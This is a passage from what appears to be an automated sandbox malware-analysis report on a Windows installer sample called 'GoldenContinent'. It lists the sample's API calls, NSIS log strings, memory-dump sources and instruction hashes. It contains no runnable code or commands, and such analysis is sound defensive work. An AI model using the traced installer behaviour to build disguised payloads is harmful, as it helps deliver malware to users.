wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
